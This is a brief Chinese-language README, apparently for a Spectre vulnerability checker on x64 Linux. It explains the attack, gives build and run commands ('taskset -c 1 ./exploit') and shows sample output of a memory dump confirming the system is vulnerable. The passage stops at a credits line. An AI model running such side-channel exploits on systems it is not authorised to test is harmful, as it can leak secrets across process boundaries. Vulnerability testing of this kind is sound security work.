
Spectre 打破了不同应用程序之间的隔离。它允许攻击者诱骗遵循最佳实践的无错误程序泄露其秘密。事实上,上述最佳实践中的安全检查反而增加了攻击面,并可能使应用程序更容易受到 Spectre 的影响。
此漏洞利用程序会检查你的 Linux(仅限 x64)是否存在 Spectre 漏洞。
只需运行 make 即可编译源代码。
执行该漏洞利用程序
taskset -c 1 ./exploit
[+] Testing for Spectre
[+] Dumping memory from 0xffffffffffdfeea8 to 0xffffffffffdfeec2
[+] Dumped bytes match the expected value
[+] System vulnerable to spectre
Spectre 是由两人独立发现并报告的: